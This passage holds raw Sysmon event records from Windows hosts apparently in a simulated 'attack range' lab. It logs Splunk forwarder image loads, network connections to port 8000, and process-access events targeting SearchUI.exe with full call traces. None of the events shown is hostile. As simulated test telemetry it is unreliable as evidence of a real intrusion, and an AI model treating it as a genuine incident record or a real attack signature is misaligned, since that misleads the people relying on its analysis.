10:40:37.287{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=656AF4A7D3B18964CD9021C00B5ACD74,SHA256=52AED7BA4E385C0B340ADA1054E05F2377DA5134A8F573A940DA435C977F613F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214848Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:34.586{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51219-false10.0.1.12-8000- 23542300x8000000000000000285759Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:38.708{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=275606279B815BCB71BFF926A9AA24B3,SHA256=943DB8EFE714FF6F4D220038AC8F61ED2D7D0526DB0FD85F84736E96B92450A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214850Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:38.302{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E0EBDB0FE7D1EBFF3D81A9F50CF2D24,SHA256=443C2B3E9687C3A86545A70212F52D199EE0A8190B67A8F00E67633CBB5699D3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285793Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:37.605{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53282-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000214851Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:39.318{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A404463F04BA4C0B68650D7364C82D00,SHA256=67FA7DF501095DAD905923A3BCE13E914A47B0DBEAE77ED93850FCF17EED4202,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285792Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.708{C8EA50B7-F2AD-6215-B800-000000003802}43485380C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 10341000x8000000000000000285791Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.708{C8EA50B7-F2AD-6215-B800-000000003802}43485380C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 10341000x8000000000000000285790Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.708{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285789Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.708{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285788Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.708{C8EA50B7-F2AD-6215-C000-000000003802}48565368C:\Windows\Explorer.EXE{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+1093d6|C:\Windows\System32\TwinUI.dll+82ba7|C:\Windows\System32\TwinUI.dll+bed5e|C:\Windows\System32\TwinUI.dll+bed29|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285787Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.708{C8EA50B7-F2AD-6215-C000-000000003802}48565368C:\Windows\Explorer.EXE{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+1093d6|C:\Windows\System32\TwinUI.dll+82ba7|C:\Windows\System32\TwinUI.dll+bed5e|C:\Windows\System32\TwinUI.dll+bed29|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285786Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.692{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285785Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.692{C8EA50B7-F2AD-6215-B800-000000003802}43484432C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+651cb|C:\Windows\System32\combase.dll+6530c|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e|C:\Windows\System32\RPCRT4.dll+20cc7|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x8000000000000000285784Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.692{C8EA50B7-F2AD-6215-B800-000000003802}43484432C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+651cb|C:\Windows\System32\combase.dll+6530c|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e|C:\Windows\System32\RPCRT4.dll+20cc7|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x8000000000000000285783Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.630{C8EA50B7-F2AD-6215-B800-000000003802}43485380C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 10341000x8000000000000000285782Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.630{C8EA50B7-F2AD-6215-B800-000000003802}43485380C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e 10341000x8000000000000000285781Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.615{C8EA50B7-F2AD-6215-C000-000000003802}48563860C:\Windows\Explorer.EXE{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+1093d6|C:\Windows\System32\TwinUI.dll+82ba7|C:\Windows\System32\TwinUI.dll+bed5e|C:\Windows\System32\TwinUI.dll+bed29|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285780Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.615{C8EA50B7-F2AD-6215-C000-000000003802}48563860C:\Windows\Explorer.EXE{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+1093d6|C:\Windows\System32\TwinUI.dll+82ba7|C:\Windows\System32\TwinUI.dll+bed5e|C:\Windows\System32\TwinUI.dll+bed29|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285779Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.615{C8EA50B7-F2AD-6215-C000-000000003802}48564980C:\Windows\Explorer.EXE{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba0bc|C:\Windows\System32\TwinUI.dll+ba897|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+651cb|C:\Windows\System32\combase.dll+6530c|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+61d3f|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+5e426|C:\Windows\System32\combase.dll+5dbda|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x8000000000000000285778Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.615{C8EA50B7-F2AD-6215-C000-000000003802}48564980C:\Windows\Explorer.EXE{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba0bc|C:\Windows\System32\TwinUI.dll+ba897|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+651cb|C:\Windows\System32\combase.dll+6530c|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+61d3f|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+5e426|C:\Windows\System32\combase.dll+5dbda|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x8000000000000000285777Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.598{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285776Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.583{C8EA50B7-F11F-6215-0D00-000000003802}8881056C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285775Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.583{C8EA50B7-F11F-6215-0D00-000000003802}8881056C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285774Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.583{C8EA50B7-F11F-6215-0D00-000000003802}8881056C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285773Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.583{C8EA50B7-F11F-6215-0D00-000000003802}8881056C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\n